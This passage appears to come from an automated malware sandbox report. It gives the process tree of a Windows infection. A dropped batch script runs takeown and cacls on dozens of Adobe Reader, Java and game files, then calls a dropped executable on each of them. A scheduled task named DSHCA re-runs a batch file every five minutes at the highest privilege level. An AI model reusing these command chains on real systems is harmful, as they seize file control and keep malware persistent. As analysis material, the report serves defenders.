      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BtGVQMhR.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1956
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BtGVQMhR.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1856
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1116
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1376
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:612
    - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL64.exe
        
        7FvmLmKL.exe -accepteula "SignHere.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:852
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1748
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:976
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:808
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  - Loads dropped DLL
  PID:988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "license.html" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "license.html" -nobanner
      4⤵
      Executes dropped EXE
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  - Loads dropped DLL
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "RTC.der" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "RTC.der" -nobanner
      4⤵
      Executes dropped EXE
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  - Loads dropped DLL
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    - Modifies file permissions
    PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "end_review.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1660
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "end_review.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1656
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  - Loads dropped DLL
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1512
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  - Loads dropped DLL
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  - Loads dropped DLL
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1660
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      Executes dropped EXE
      PID:304
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "warning.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "warning.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  - Loads dropped DLL
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:224
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1748
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    - Modifies file permissions
    PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:600
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:1512
